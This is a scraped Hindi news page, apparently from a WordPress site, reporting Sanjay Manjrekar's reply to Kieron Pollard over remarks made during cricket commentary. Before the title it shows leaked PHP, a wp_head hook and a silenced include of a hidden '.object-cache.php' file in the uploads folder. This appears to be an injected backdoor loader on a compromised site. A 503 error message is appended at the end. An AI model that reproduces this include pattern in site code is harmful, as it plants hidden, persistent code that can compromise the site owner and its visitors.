add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘आलोचना विवाद’ पर पोलार्ड को मांजरेकार ने दिया जवाब – SOCH INDIA
Menu

खेल
‘आलोचना विवाद’ पर पोलार्ड को मांजरेकार ने दिया जवाब

nobanner

पूर्व भारतीय क्रिकेटर और अब कमेंटेटर संजय मांजरेकर ने कीरोन पोलार्ड पर कमेंट्री करते हुए की गयी टिप्पणी पर आज स्पष्टीकरण दिया और कहा कि उन्होंने वेस्टइंडीज के खिलाड़ी को कभी ‘बुद्धिहीन’ नहीं कहा था. वीडियो फुटेज से भी यह साफ हो गया था कि मांजरेकर ने ‘बुद्धिहीन’ शब्द का उपयोग नहीं किया था लेकिन पोलार्ड ने ट्विटर ने इस पूर्व क्रिकेटर को आड़े हाथों लिया जिसके बाद सोशल मीडिया पर कड़ी प्रतिक्रिया हुई.

मांजरेकर ने आज ट्वीट करते हुए कहा,‘‘कहा था कि क्या वह(उपरी क्रम में बल्लेबाजी करने की) क्षमता रखते हैं. ‘बुद्धिहीन’ या ‘दिमाग नहीं है’ जैसे शब्दों का उपयोग करना मेरी शैली नहीं है. मैं किसी का आलोचक हो सकता हूं लेकिन अपमान कभी नहीं कर सकता.’’

उन्होंने आगे लिखा,‘‘मैं पोलार्ड मामले में प्रतिक्रिया करने वालों को फुटेज सुनने के लिये भी कहूंगा.’’ मांजरेकर की पोलार्ड की बल्लेबाजी को लेकर की गयी टिप्पणी पर मुंबई इंडियन्स के आलराउंडर ने कड़ी प्रतिक्रिया की. इसके अलावा सोशल मीडिया पर भी उन्हें काफी आलोचना का सामना करना पड़ा था. पोलार्ड को लगा कि इस भारतीय ने कमेंट्री करते हुए उन्हें ‘बुद्धिहीन’ करार दिया था.

पोलार्ड ने अपने पहले ट्वीट में लिखा,‘‘संजय मांजरेकर आपको क्या लगता है कि कि आपको कुछ भी बोलने की आजादी है क्योंकि आपको बोलने के लिये पैसा दिया जाता तो आप बकवास करना जारी रख सकते हो.’’ उन्होंने एक अन्य ट्वीट में कहा, ‘‘क्या आप जानते हो मुझे इतना अधिक पैसा कैसे मिला है. क्या बुद्धिहीन होने के लिये. शब्दों में बहुत ताकत होती है. जब शब्द बाहर निकल जाते हैं तो फिर वापस नहीं आते.’’

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.